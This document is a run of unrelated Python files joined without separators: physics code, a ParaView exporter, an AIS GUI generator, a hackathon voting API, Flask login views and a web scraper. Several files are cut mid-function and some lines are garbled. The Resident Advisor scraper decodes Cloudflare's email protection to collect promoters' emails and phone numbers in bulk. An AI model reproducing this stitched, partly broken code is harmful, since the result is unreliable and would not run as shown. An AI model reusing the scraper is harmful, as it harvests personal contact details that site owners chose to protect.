xe : float The ionization fraction ne/nH. dE_dVdt_inj : float dE/dVdt, i.e. energy injection rate of DM per volume per time dt : float time in seconds over which these electrons were deposited. Returns ------- list of floats Ratio of deposited energy to a given channel over energy deposited by DM. The order of the channels is heat, lyman, ionH, ionHe, cont """ rs = spec_elec.rs #Fractions of energy being split off into each channel fracs_grid = MEDEA_interp.get_vals(xe, spec_elec.eng) #enforce that all functions sum to 1 fracs_grid /= np.sum(fracs_grid, axis=1)[:, np.newaxis] #compute ratio of deposited divided by injected norm_factor = phys.nB * rs**3 / (dt * dE_dVdt_inj) totengList = spec_elec.eng * spec_elec.N * norm_factor f_elec = np.array([ np.sum(totengList * fracs) for fracs in np.transpose(fracs_grid) ]) return np.array([f_elec[4], f_elec[1], f_elec[2], f_elec[3], f_elec[0]]) class gestureDetector: def __init__(self,name,detector,confidence_threshold,image_height,image_width): self.name = name self.confidence_threshold = confidence_threshold self.detector = detector self.image_height = image_height self.image_width = image_width print("Initialized {} with confidence threshold: {}".format(self.name,self.confidence_threshold)) def detect_image(self,imageInput): return bool , str , int , int , int# Copyright 2013 Velodyne Acoustics, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json import shutil import zipfile import contextlib import os import tempfile import datetime def colorMapProperties(t): p = {} p['rgb_points'] = list(t.RGBPoints) if t.ColorSpace == 'HSV' and t.HSVWrap: p['color_space'] = 'WrappedHSV' else: p['color_space'] = t.ColorSpace p['number_of_values'] = t.NumberOfTableValues p['vector_component'] = t.VectorComponent return p def cameraProperties(view): p = {} p['focal_point'] = list(view.CameraFocalPoint) p['position'] = list(view.CameraPosition) p['view_up'] = list(view.CameraViewUp) p['view_angle'] = view.CameraViewAngle if view.CameraParallelProjection: p['parallel_scale'] = list(view.CameraParallelScale) return p def getObjectMetaData(rep): metaData = {} if rep.ColorArrayName: metaData['color_map'] = colorMapProperties(rep.LookupTable) metaData['color_by'] = rep.ColorArrayName[1] else: metaData['color'] = list(rep.DiffuseColor) return metaData def getSceneMetaData(view): scene = {} objects = [] scene['background_color'] = list(view.Background) if view.UseGradientBackground: # switch the ordering, paraview's Background2 means the top gradient color scene['background_color'] = list(view.Background2) scene['background_color2'] = list(view.Background) if view.BackgroundTexture: scene['background_image'] = exportTexture(view.BackgroundTexture, baseDir) scene['camera'] = cameraProperties(view) return scene def writeJsonData(outDir, view, rep, dataFilenames): scene = getSceneMetaData(view) objectMetaData = getObjectMetaData(rep) objectMetaData['point_size'] = 2 if len(dataFilenames) > 1: objectMetaData['filenames'] = dataFilenames objectMetaData['frames_per_second'] = 18 else: objectMetaData['filename'] = dataFilenames[0] scene['objects'] = [objectMetaData] jsonStr = json.dumps(scene, indent=4) sceneFile = os.path.join(outDir, 'scene.kiwi') open(sceneFile, 'w').write(jsonStr) def zipDir(inputDirectory, zipName): assert os.path.isdir(inputDirectory) inputDirectory = os.path.abspath(inputDirectory) parentDirectory = os.path.dirname(inputDirectory) + os.sep with contextlib.closing(zipfile.ZipFile(zipName, 'w', zipfile.ZIP_DEFLATED)) as archive: for root, dirs, files in os.walk(inputDirectory): for filename in files: absoluteFilename = os.path.join(root, filename) relativeFilename = absoluteFilename[len(parentDirectory):] archive.write(absoluteFilename, relativeFilename) import itertools import copy import pprint from pdb import set_trace as _breakpoint r_exclusive_groups = [("Water", "Building"),("UrbanPark","CropYield"),("ForestPlantation",)] r_mandatory = ["Trees","Herbs"] r_optional = ["Shrubs",] q_mandatory = ["Herbs", "Shrubs"] q_optional = ["Shrubs",] rmp = list(itertools.permutations(r_mandatory)) qmp = list(itertools.permutations(q_mandatory)) def generate_valid_permutations(mandatory_list, optional_list, exclusive_groups, greedy_mode = False): # elements in exclusive groups are mandatory in an exclusive way, one for each group and then permutated # actually, it's a set product, with one element for group exclusive_product_group = list(itertools.product(*exclusive_groups)) #print(exclusive_product_group) # mandatory elements must always 
be present, creating pseudo-groups mandatory_groups = [mandatory_list] apl = list(itertools.product(mandatory_groups,exclusive_product_group)) # these are the lists obtained combining mandatory elements with exclusive elements always_present_list = [list(itertools.chain(p1,p2)) for p1, p2 in apl] #print(always_present_list) # all permutations of these lists should be checked and computed ap_perm = [] if greedy_mode: for g in always_present_list: ap_perm.extend(list(itertools.permutations(g))) else: ap_perm = copy.copy(always_present_list) # this is the result #print(ap_perm) # now extending the list with optional elements, creating pseudo-groups optional_group = [(el,) for el in optional_list] # since these elements are optional, they can be matched as last resort only pc = list(itertools.product(ap_perm, optional_group)) #print(pc) #_breakpoint() permutations = copy.copy(ap_perm) additional_elements = [list(itertools.chain(p1,p2)) for p1, p2 in pc] permutations.extend(additional_elements) # now all permutations have been computed return permutations #return pc rmp = generate_valid_permutations(r_mandatory ,r_optional, r_exclusive_groups, greedy_mode = True) #qmp = generate_valid_permutations(q_mandatory, q_optional) pprint.pprint(rmp) pprint.pprint("number of permutations: {0}".format(len(rmp))) import re heroregex=re.compile(r'Batman|') mo1=heroregex.search('Batman and .') print(mo1.group()) mo1=heroregex.search(' and Batman') print(mo1.group()) batregex=re.compile(r'Bat(man|mobile|copter|bat|bug)') mo=batregex.search('Batmobile lost a wheel') print(mo.group()) print(mo.group(1))# Copyright (c) 2014-present PlatformIO <> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import importlib import re from platformio.debug.config.generic import GenericDebugConfig from platformio.debug.config.native import NativeDebugConfig class DebugConfigFactory(object): @staticmethod def get_clsname(name): name = re.sub(r"[^\da-z\_\-]+", "", name, flags=re.I) return "%s%sDebugConfig" % (name.upper()[0], name.lower()[1:]) @classmethod def new(cls, platform, project_config, env_name): board_config = platform.board_config( project_config.get("env:" + env_name, "board") ) tool_name = ( board_config.get_debug_tool_name( project_config.get("env:" + env_name, "debug_tool") ) if board_config else None ) config_cls = None try: mod = importlib.import_module("platformio.debug.config.%s" % tool_name) config_cls = getattr(mod, cls.get_clsname(tool_name)) except ModuleNotFoundError: config_cls = ( GenericDebugConfig if platform.is_embedded() else NativeDebugConfig ) return config_cls(platform, project_config, env_name) #!/usr/bin/env python __version__ = '$Revision: 4791 $'.split()[1] __date__ = '$Date: 2006-09-24 14:01:41 -0400 (Sun, 24 Sep 2006) $'.split()[1] __author__ = '' __doc__=''' Build a wxpython interface that uses the aisxmlbinmsg2py generated file to create a message string. aisxmlbinmsg2py was getting too long, so this functionality is completely broken out. 
@copyright: 2006 @license: Apache 2.0 @bug: FIX: Handle text fields @bug: FIX: deal with the name mangling flag in the xml? ''' import sys, os from lxml import etree def hasSubTag(et,subtag): ''' @return: true if the tag a sub tag with name subtag ''' if 04: return False if hasSubTag(field,'lookuptable'): return True return False def createChoiceList(o,fieldET): '''Create the wx.Choice list of entries''' lookup = fieldET.xpath('lookuptable')[0] name = fieldET.attrib['name'] fieldType = fieldET.attrib['type'] if fieldType == 'int': assert False # FIX: write me! elif fieldType == 'uint': o.write('\t'+name+'List = [\n') lastVal=0 for entry in lookup.xpath('entry'): entryKey = int(entry.attrib['key']) #print lastVal, entryKey, range(lastVal,entryKey) for i in range(lastVal,entryKey): o.write('\t\t\''+str(i)+'\',\n') lastVal = entryKey + 1 # Ready for the next key o.write('\t\t\''+str(entryKey)+' - '+entry.text+'\',\n') o.write('\t\t]\n') elif fieldType == 'bool': pass # Just one bool list else: print 'ERROR: not handling the choice for ',name,fieldType #assert False def generateWxPython(infile,outfile, prefixName=False,verbose=False): ''' @param infile: xml ais binary message definition file @param outfile: where to dump the python code ''' aisMsgsET = etree.parse(infile).getroot() o = file(outfile,'w') os.chmod(outfile,0755) print 'FIX: make the python command user selectable' o.write('''#!/usr/bin/env pythonw # mac specific # FIX: put some documentation here! import wx ''') #for msgET in aisMsgsET.xpath('message'): #o.write('#import '+msgET.attrib['name']+' \t# FIX: turn this back on\n') print 'FIX: make a more rebust determination of the module name' o.write('#import '+outfile.split('.')[0]+'\t# FIX: turn this back on\n') # FIX: NUKE THIS HACK... o.write(''' testParams = {'COG': 34.5, 'MessageID': 1, 'NavigationStatus': 3, 'PositionAccuracy': 1, 'Position_latitude': 37.424458333333334, 'Position_longitude': -122.16328055555556, 'RAIM': False, 'ROT': -2, 'RegionalReserved': 0, 'RepeatIndicator': 1, 'SOG': 101.9, 'Spare': 0, 'TimeStamp': 35, 'TrueHeading': 41, 'UserID': 1193046, 'slotoffset': 1221, 'syncstate': 2} ''') for msgET in aisMsgsET.xpath('message'): #if msgET.tag != 'message': continue print msgET.tag, msgET.attrib['name'] if len(msgET.xpath('include-struct')) > 0: sys.exit("ERROR: cannot handle xml that still has include-struct tags.\n Please use expandais.py.") buildWxPythonMsg(o,msgET,prefixName=prefixName,verbose=verbose) def buildWxPythonMsg(o,msgET, verbose=False, prefixName=False): ''' Write a class for the wx python. @param o: open file where resulting code will be written @param msgET: Element Tree starting at a message node TODO(schwehr):for lookuptable/entry values, make it also print the decoded value. TODO(schwehr):use a different name for message and field ''' assert(msgET.tag=='message') msgName = msgET.attrib['name'] className = 'MsgFrame' if prefixName: className = msgName+'MsgFrame' o.write('class '+className+'(wx.Frame):\n') o.write('''\t\'\'\' # FIX: write doc string here for the frame \'\'\' ''') for field in msgET.xpath('field'): if verbose: print 'Does field',field.attrib['name'],'use choice ...', if useChoice(field): createChoiceList(o,field) if verbose: print 'yes' elif verbose: print 'no' # All bools use the same lookup list if hasBoolField(msgET): o.write('\tBoolList=[\'False\',\'True\']\n') o.write(''' def __init__(self,parent,title,msgDict): \'\'\' @param msgDict: Default values to use. Overwritten with the return values. 
Values that are required will be ignored. @type msgDict: dict \'\'\' wx.Frame.__init__(self,parent,-1,title,size=(640,480)) # FIX: what size? self.msgDict = msgDict # Save this so we can edit and return valies in the incoming dict defaults = testParams # FIX: turn off this hack and use the unavailable values sizer=wx.FlexGridSizer(rows=1,cols=2, vgap=13, hgap=13) sizer.AddGrowableCol(1) self.SetSizer(sizer) ''') for field in msgET.xpath('field'): # FIX: does not cope with arrays of anything other than strings name = field.attrib['name'] fieldType = field.attrib['type'] numBits = int(field.attrib['numberofbits']) o.write('\n\t\t############################ Field '+name+' - '+fieldType+'\n') o.write('\t\ttxt = wx.StaticText(self,label=\''+name+'\')\n') if hasSubTag(field,'required'): o.write('\t\tself.'+name+'Widget=wx.StaticText(self,label=\''+field.xpath('required')[0].text+'\')\n') else: o.write('\t\tvalue=str(defaults[\''+name+'\'])\n') o.write('\t\tif \''+name+'\' in msgDict: value = str(msgDict[\''+name+'\'])\n') o.write('\t\tself.'+name+'Widget=') # Need to lookup what to do... if 'uint'==fieldType: if useChoice(field): o.write('wx.Choice(self,-1, choices = self.'+name+'List)\n') o.write('\t\tself.'+name+'Widget.SetSelection(int(value))\n') else: o.write('wx.SpinCtrl(self,value=value,min=0,max='+str(2**numBits - 1)+')\n') elif 'int'==fieldType: if useChoice(field): o.write('wx.Choice(self,-1, choices = self.'+name+'List)\n') # FIX: need to figure out how to select choices when they could be negative assert False else: o.write('wx.SpinCtrl(self,value=value,min='+str(2**(numBits-1))+',max='+str(2**(numBits-1) - 1)+')\n') elif 'bool'==fieldType: o.write('wx.Choice(self,-1, choices = self.BoolList)\n') o.write('\t\tif defaults[\''+name+'\']: self.'+name+'Widget.SetSelection(1)\n') o.write('\t\telse: self.'+name+'Widget.SetSelection(0)\n') elif fieldType in ['udecimal','decimal']: scale = float(field.xpath('scale')[0].text) if fieldType=='udecimal': o.write('wx.Slider(self,-1,float(value),0,'+str((2**numBits -1) / scale)) else: #print name, numBits #print 2**(numBits-1) start = '-'+str((2**(numBits-1)) / scale) end = str((2**(numBits-1) - 1) / scale) if hasSubTag(field,'range'): # FIX: need to also create a validator that allow min .. 
max plus the unavailable range = field.xpath('range')[0] start = float(range.attrib['min']) end = float(range.attrib['max']) if hasSubTag(field,'unavailable'): unavailable = float(field.xpath('unavailable')[0].text) if unavailable < start: start = unavailable if end < unavailable: end = unavailable #print 'decimal',start,end o.write('wx.Slider(self,-1,float(value),'+str(start)+','+str(end)) o.write(',style=wx.SL_HORIZONTAL|wx.SL_AUTOTICKS | wx.SL_LABELS)\n') else: print 'Please follow the GPS navigation system over the cliff',name,fieldType assert(False) o.write('\t\tdel value\n') o.write('\n') o.write('\t\tsizer.Add(item=txt); del txt\n') o.write('\t\tsizer.Add(self.'+name+'Widget,flag=wx.EXPAND)\n') o.write(''' ####### ####### FINISH UP __init__ ####### btnDone = wx.Button(self,label='Done') sizer.Add((1,35),0,wx.ADJUST_MINSIZE,0) sizer.Add(item=btnDone) btnDone.Bind(wx.EVT_BUTTON,self.OnDone) self.Layout() # Get yourself organized self.Show() def OnDone(self,evt): \'\'\' Put all values into msgDict so that they get returned to the caller \'\'\' ''') for field in msgET.xpath('field'): name = field.attrib['name'] fieldType = field.attrib['type'] if hasSubTag(field,'required'): # FIX: need to set the type right on the values if fieldType in ['int','uint']: o.write('\t\tself.msgDict[\''+name+'\']='+field.xpath('required')[0].text+'\n') else: print 'FIX: need to write this case!' assert False else: if fieldType in ['int','uint','bool','udecimal','decimal']: if useChoice(field): o.write('\t\tself.msgDict[\''+name+'\']=self.'+name+'Widget.GetSelection()\n') else: o.write('\t\tself.msgDict[\''+name+'\']=self.'+name+'Widget.GetValue()\n') elif fieldType in ['decimal','udecimal']: print 'FIX: what do I do about decimals?' o.write('\t\t#FIX: handle '+name+' '+fieldType+'\n') else: print 'FIX: need to write the other cases here', name, fieldType o.write('\t\t#FIX: handle '+name+' '+fieldType+'\n') assert False o.write('\t\tself.Close(True)\n') # FIX: put in command line interface here... # FIX: what if there is more than one message?? o.write(''' if __name__=='__main__': app = wx.PySimpleApp() theData={} frame = MsgFrame(None,\''''+msgName.capitalize()+''' Message Editor',theData) app.MainLoop() print 'finishing up', theData ''') ###################################################################### if __name__=='__main__': from optparse import OptionParser parser = OptionParser(usage="%prog [options]", version="%prog "+__version__) parser.add_option('-o','--output',dest='outputFileName',default=None, help='Name of the python file to write') parser.add_option('-i','-x','--xml-definition',dest='xmlFileName',default=None, help='XML definition file for the msg to use') parser.add_option('--doc-test',dest='doctest',default=False,action='store_true', help='run the documentation tests') parser.add_option('-p','--prefix',dest='prefix',default=False,action='store_true', help='put the field name in front of all function names.' 
+' Allows multiple messages in one file') parser.add_option('-v','--verbose',dest='verbose',default=False,action='store_true', help='run the tests run in verbose mode') (options,args) = parser.parse_args() success=True if options.doctest: import os; print os.path.basename(sys.argv[0]), 'doctests ...', argvOrig = sys.argv sys.argv= [sys.argv[0]] if options.verbose: sys.argv.append('-v') import doctest numfail,numtests=doctest.testmod() if numfail==0: print 'ok' else: print 'FAILED' success=False sys.argv = argvOrig # Restore the original args del argvOrig # hide from epydoc sys.exit() # FIX: Will this exit success? if None==options.xmlFileName: sys.exit('ERROR: must specify an xml definition file.') if None==options.outputFileName: sys.exit('ERROR: must specify an python file to write to.') generateWxPython(options.xmlFileName,options.outputFileName,prefixName=options.prefix ,verbose=options.verbose) print '\nrecommend running pychecker like this:' print ' pychecker -q',options.outputFileName from save_data import save_data from bs4 import BeautifulSoup import pandas as pd import requests import re # Url to RA website used to build links for each promoter base_url = 'https://www.residentadvisor.net' # Headers to mimic browser behavior headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'} # Using session() to keep cookies for ajax s = requests.Session() class Country: """ Holds country name and link """ def __init__(self, name, link): self.name = name self.link = link class City: """ Holds city/state name and link """ def __init__(self, name, link): self.name = name self.link = link class Promoter: """ Holds attributes for each promoter """ def __init__(self, *args): self.name = args[0] self.email = args[1] self.website = args[2] self.facebook = args[3] self.youtube = args[4] self.instagram = args[5] self.phone = args[6] self.twitter = args[7] # Got this from https://stackoverflow.com/questions/36911296/scraping-of-protected-email # Decoding CloudFlares email protection def decode_email(e): de = "" k = int(e[:2], 16) for i in range(2, len(e) - 1, 2): de += chr(int(e[i:i + 2], 16) ^ k) return de def get_countries(url): all_countries = [] r = s.get(url, headers=headers) r.raise_for_status() soup_country = BeautifulSoup(r.text, 'lxml') items = soup_country.find_all(class_='links') country_list = items[0].find_all('li') for item in country_list: all_countries.append(Country(name=item.text, link=item.find('a')['href'])) # print(item.attrs['data-id']) return all_countries def get_cities(url): all_cities = [] r = s.get(base_url + url, headers=headers) r.raise_for_status() soup_city = BeautifulSoup(r.text, 'lxml') items = soup_city.find_all(class_='links') # State/Region etc links have class parent # Links without parent class are for each city # But the parent class links will pull up all the sub-cities city_list = items[1].find_all('li', class_='parent') # Iterate over city_list to extract urls and append to all_cities for item in city_list: all_cities.append(City(name=item.text, link=item.find('a')['href'])) return all_cities def get_links(city_link): """ Gets url's of all the promoters :return: list of links corresponding to each Promoter and total number of records """ # Using created session to go to RA website r = s.get(base_url + city_link, headers=headers) r.raise_for_status() # Parsing through BS4 soup = BeautifulSoup(r.content, 'lxml') # Selecting html element Form1 which contains all promoters form 
= soup.find(id="Form1") # Finding all list items inside the Form1 table all_items = form.find_all('li') # Using set to hold links to automatically delete duplicates links = set() # Iterating over all list items (table) for item in all_items: link = item.find('a') # Finding all anchor ('a')
tags if 'id=' in str(link): # If the href contains "id=" it points to a promoter links.add(link.get('href')) # Retrieve href (url) for every tag return list(links), len(links) def get_init_data(promoter_list, num_of_records): """ Goes to each promoter url inside the promoter_list to scrape data :param promoter_list: List returned from get_links() :param num_of_records: number of records to pull :return: final_list which holds Promoter object for each promoter """ # List holding Promoter class objects final_list = [] # Check what the user inputted for Number of Records to pull? if num_of_records == 0: # Setting number of records to length of list rec_to_pull = len(promoter_list) else: # Setting number of records to user input rec_to_pull = num_of_records # Iterating over promoter_list then running it through get_data() # Creating a new Promoter class object for each promoter # Then appending it to final list for link in promoter_list[0:rec_to_pull]: if check_if_active(link): final_list.append(Promoter(*get_data(link))) else: pass return final_list def check_if_active(promoter_link): """ Checks to see if promoter is active by looking at existence of events in it's events page :param promoter_link: link for each promoter with id :return: boolean if promoter has events or not """ # Checking if promoter is active by looking at number of events parameters = {'show': 'events'} # show=events parameters takes us to promoter events page r3 = s.get(base_url + promoter_link, params=parameters) # Parse data soup_events = BeautifulSoup(r3.text, 'lxml') # Find div that contains events div_for_events = soup_events.find(id='divArchiveEvents') # Pull up all table
'li' tags inside above div # These are all events found events = div_for_events.find_all('li') # If the list 'events' is empty, then promoter has no events if len(events) > 0: return True else: return False def get_data(promoter_link): """ Gets Promoter data from the provided promoter_link :param promoter_link: each link from the total promoters list :return: tuple of retrieved attributes """ # Creating the promoter url r2 = s.get(base_url + promoter_link) r2.raise_for_status() soup_promoter = BeautifulSoup(r2.text, 'lxml') # Getting the name of the Promoter name = soup_promoter.select_one('h1').text # Setting default values email = 'N/A' website = 'N/A' facebook = 'N/A' youtube = 'N/A' instagram = 'N/A' phone = 'N/A' twitter = 'N/A' try: # Looking for the section that has text "On the internet" # Then getting its parent which contains all contact info social = soup_promoter.select_one('div:contains("On the internet")').parent try: email_class = social.select_one('a:contains("Email")') # CloudFlare hosted websites encode emails for protection email = decode_email(email_class.get('href').split('#')[1]) except: pass try: website_class = social.select_one('a:contains("Website")') website = website_class.get('href') except: pass try: facebook_class = social.select_one('a:contains("Facebook")') facebook = facebook_class.get('href') except: pass try: youtube_class = social.select_one('a:contains("Youtube")') youtube = youtube_class.get('href') except: pass try: instagram_class = social.select_one('a:contains("Instagram")') instagram = instagram_class.get('href') except: pass try: twitter_class = social.select_one('a:contains("Twitter")') twitter = twitter_class.get('href') except: pass except: pass try: # Getting the phone number inside a list item ('li')
phone_number = soup_promoter.select_one("li div:contains('Phone')").text # Running a regex search for selecting the phone number phone = re.findall(r'\d{10}', phone_number)[0] except: pass return name, email, website, facebook, youtube, instagram, phone, twitter def format_data(result_list): """ Creates a Data Frame with results from get_init_data() :param result_list: results from get_init_data() :return: Final Data Frame containing data for each Promoter """ df = pd.DataFrame() df['Name'] = [p.name for p in result_list] df['Email'] = [p.email for p in result_list] df['Phone'] = [p.phone for p in result_list] df['Website'] = [p.website for p in result_list] df['Facebook'] = [p.facebook for p in result_list] df['Youtube'] = [p.youtube for p in result_list] df['Instagram'] = [p.instagram for p in result_list] df['Twitter'] = [p.twitter for p in result_list] return df def show_results(final_df): """ Prints the final Data Frame from format_data() to console :param final_df: Final Data Frame from format_data() :return: Prints the Data Frame in console """ # Settings to print the data frame to console correctly desired_width = 480 pd.set_option('display.width', desired_width) pd.set_option('display.max_columns', 8) print(final_df) if __name__ == '__main__': print('Running Program...') countries = get_countries('https://www.residentadvisor.net/promoters.aspx') for country in countries: country_data = [] print('-' * 45) print(f'Getting data from {country.name}') print('-' * 45) cities = get_cities(url=country.link) for city in cities: promoters, total_records = get_links(city_link=city.link) print(f'Total Promoters Found in {city.name}: {total_records}') # rec = input('Records to pull (0 means all) > ') country_data.extend(get_init_data(promoter_list=promoters, num_of_records=int(0))) final_data_frame = format_data(country_data) print(f'Saving data for {country.name}...') print('-' * 45) save_data('Data', country.name, final_data_frame) # Show results in console show_results(final_data_frame) DevKor-Team/devkor_hackathon_back from rest_framework.permissions import IsAdminUser, IsAuthenticated from rest_framework.response import Response from rest_framework.views import APIView from .models import VoteSchedule from .serializers import VoteSerializer class VoteAPIView(APIView): permission_classes = [IsAuthenticated] def post(self, request, *args, **kwargs): team_id = request.data.get("team") demo_ids = request.data.get("demo", []) schedule = VoteSchedule.currently() if not schedule: return Response( {"error": "No vote schedule is currently active."}, status=400 ) if schedule.is_test and not request.user.is_staff: return Response({"detail": "Test voting is not allowed."}, status=403) if schedule.max_votes != len(demo_ids): return Response({"error": "Too many or too few votes."}, status=400) votes = [ { "team": team_id, "demo": demo_id, "priority": i + 1, "schedule": schedule.id, } for i, demo_id in enumerate(demo_ids) ] serializer = VoteSerializer(data=votes, many=True, context={"request": request}) serializer.is_valid(raise_exception=True) serializer.save() return Response(serializer.data) class VotableAPIView(APIView): permission_classes = [IsAuthenticated] def get_response(self, votable): return Response({"votable": votable}) def get(self, request, *args, **kwargs): schedule = VoteSchedule.currently() if not schedule: return self.get_response(False) if schedule.is_test and not request.user.is_staff: return self.get_response(False) # TODO team year for team in
request.user.teams.all(): if (not team.voted(schedule)) and (team.leader == request.user): return self.get_response(True) return self.get_response(False) class VoteResultAPIView(APIView): permission_classes = [IsAdminUser] def get(self, request, *args, **kwargs): schedule = VoteSchedule.past() if schedule.count() < 1: return Response({"error": "No past vote schedule."}, status=404) if not request.user.is_staff: return Response({"error": "No permission."}, status=403) return Response(schedule.last().get_result()) # -*- coding: utf-8 -*- """Pre-defined neural network layers based on TensorFlow. Capitalized layers should be classes inherited from base.Layer, while lower-cased ones should directly produce a tensor as the layer output. """ from .base import * from .dense import * from .linear import * from .regularization import * from .softmax import * godcrampy/py-graphics-h from typing import Dict from .token import Token, TokenType, LiteralType class Identifier(Token): def eval(self, variables: Dict[str, any]): return variables[self.name] def __init__(self, name: str, value, literal_type: LiteralType): super().__init__(TokenType.IDENTIFIER) self.name = name self.value = value self.literal_type = literal_type""" @Description: Helper for plotting training and test loss over a number of epochs @Author: tc @Time: 2021/6/14 10:54 """ import matplotlib.pyplot as plt from IPython import display def set_figsize(figsize=(3.5, 2.5)): use_svg_display() # Set the figure size plt.rcParams['figure.figsize'] = figsize def use_svg_display(): """Use svg format to display plot in jupyter""" display.set_matplotlib_formats('svg') def semilogy(x_vals, y_vals, x_label, y_label, x2_vals=None, y2_vals=None, legend=None, figsize=(3.5, 2.5)): set_figsize(figsize) plt.xlabel(x_label) plt.ylabel(y_label) plt.semilogy(x_vals, y_vals) if x2_vals and y2_vals: plt.semilogy(x2_vals, y2_vals, linestyle=':') plt.legend(legend) plt.show() from django import forms from backend.core.utils import APIClient class LocationForm(forms.Form): """LocationForm definition.""" location = forms.CharField(required=True) def clean_location(self): data = self.cleaned_data['location'] try: self.result = APIClient.get_or_create_temperature_info(data) except Exception as inst: raise forms.ValidationError(f'{inst}') return data #!/usr/bin/env python3 import os,sys base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.append(base_dir) from conf import config from core import main #$ Set a counter equal to the total number of rounds round_num = config.ROUND #$ Set a counter for the current round number; it increases by 1 each iteration num = 1 #$ Loop over the total number of rounds, decreasing the counter by 1 each iteration; when it reaches 0 the loop ends and the game is over while round_num: print("Round %s" % num) #$ Check whether the number entered by the player is in the random-number list; int() is used because the input-handling function returns a str, so it must be converted to an integer before the membership test. if int(main.player.shoot()) in main.keeper.defense(): #$ If it is, the keeper saves the ball and the keeper's score increases by 1 main.k1.fraction += 1 print("Sorry, the ball was saved") print("%s, score: %s %s, score: %s" %(main.p1.name,main.p1.fraction,main.k1.name,main.k1.fraction)) else: #$ Otherwise the ball goes in and the player's score increases by 1 print("good, it's a goal") main.p1.fraction += 1 print("%s, score: %s %s, score: %s" %(main.p1.name,main.p1.fraction,main.k1.name,main.k1.fraction)) #$ After each round, decrease the remaining round count by 1 until it reaches 0 round_num -= 1 #$ After each round, increase the round number by 1 num += 1 else: #$ Compare the two scores: if the player's score is higher than the keeper's, the player wins if main.p1.fraction > main.k1.fraction : print("good, you win") #$ If the player's score is lower than the keeper's, the keeper wins elif main.p1.fraction < main.k1.fraction : print("Sorry, you lose") #$ If the scores are equal it is a draw; this can happen when the total number of rounds is even else: print("Not bad, it's a draw") with open('data/icudt66l.dat', 'rb') as f: contents = bytearray(f.read()) # encode the data into the stubdata file result_text = "" first = True for byte in contents: if first:
result_text += str(byte) else: result_text += ", " + str(byte) first = False new_contents = """ // This file is generated by scripts/inline-data.py, do not edit it manually // #include "unicode/utypes.h" #include "unicode/udata.h" #include "unicode/uversion.h" extern "C" U_EXPORT const unsigned char U_ICUDATA_ENTRY_POINT [] = { %s }; """ % (result_text,) with open('icu/stubdata/stubdata.cpp', 'w+') as f: f.write(new_contents)oberlin/panoptespanoptes/analysis/panels/events/__init__.py from django import forms from panoptes.analysis.panels import BasePanel from panoptes.analysis.panels.events.lists import event_list_factory # Import all available event lists from panoptes.analysis.panels.events.lists import day, hour class Panel(BasePanel): """A panel that shows a list of events for a given period.""" slug = "events" template = "panoptes/analysis/panels/event_lists/panel.html" class Media: css = {'all': ("panoptes/css/analysis/panels/events/events.css",)} def __init__(self, *args, **kwargs): """Create a new event list.""" slug = kwargs.pop('list', None) if not slug: raise ValueError("You must provide a 'list' argument to the events panel") super(Panel, self).__init__(*args, **kwargs) EventList = event_list_factory(slug) self.event_list = EventList(self.sessions) self.event_list.get_events() def provide_template(self): """Render using the template of the event list, if one exists.""" return getattr(self.event_list, 'template', self.template) def provide_render_args(self): """Return render args for an event list panel and the chosen list.""" render_args = {'event_list': self.event_list} try: render_args.update(self.event_list.provide_render_args()) except AttributeError: pass return render_args def provide_media(self): """Return a Media instance for the events panel.""" return forms.Media(self.Media) app/auth/views.py from flask import render_template,redirect,url_for,flash,request from flask_login import login_user,logout_user,login_required from . import auth from ..models import User from .. import db from .forms import RegistrationForm,LoginForm @auth.route('/registration', methods=['GET','POST']) def register(): registration_form= RegistrationForm() if registration_form.validate_on_submit(): new_user = User(username=registration_form.sign_up_username.data,user_email=registration_form.sign_up_email.data,password=registration_form.sign_up_password.data) db.session.add(new_user) db.session.commit() return redirect(url_for('auth.login')) title= 'New Account' return render_template('auth/register.html',registration_form=registration_form,title=title) @auth.route('/login', methods=['GET','POST']) def login(): login_form= LoginForm() if login_form.validate_on_submit(): logged_in_user = User.query.filter_by(user_email=login_form.login_email.data).first() if logged_in_user is not None and logged_in_user.verify_password_hash(login_form.login_password.data): login_user(logged_in_user,login_form.remember_me.data) return redirect(request.args.get('next')or url_for('main.index')) flash('Invalid email or password!') title= 'Writer Login' return render_template('auth/login.html',login_form=login_form,title=title) @auth.route('/logout') @login_required def logout(): logout_user() return redirect(url_for('main.index'))google/report2bqapplication/classes/__init__.py # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os from googleapiclient.discovery import Resource from googleapiclient.errors import HttpError from messytables.types import CellType from typing import Any, Dict, Iterable, List, Mapping, Tuple, Union from classes import credentials from classes import decorators from classes import discovery from classes import firestore from classes import gmail from classes import report_type from classes import services from classes.report_config import ReportConfig class Fetcher(object): @decorators.retry(exceptions=HttpError, tries=3, backoff=2) def fetch(self, method, **kwargs: Mapping[str, str]) -> Dict[str, Any]: result = method(**kwargs).execute() return result class ReportFetcher(object): report_type: report_type.Type service_definition: services.Service chunk_multiplier = int(os.environ.get('CHUNK_MULTIPLIER', 64)) email = None project = None profile = None @property def service(self) -> Resource: """Creates the API service for the product. Returns: Resource: the service definition """ return discovery.get_service( service=self.service_definition, credentials=credentials.Credentials(email=self.email, project=self.project)) def read_header(self, report_details: ReportConfig) -> Tuple[List[str], List[CellType]]: """Reads the header of the report CSV file. Args: report_details (dict): the report definition Returns: Tuple[List[str], List[CellType]]: the csv headers and column types """ pass def stream_to_gcs(self, bucket: str, 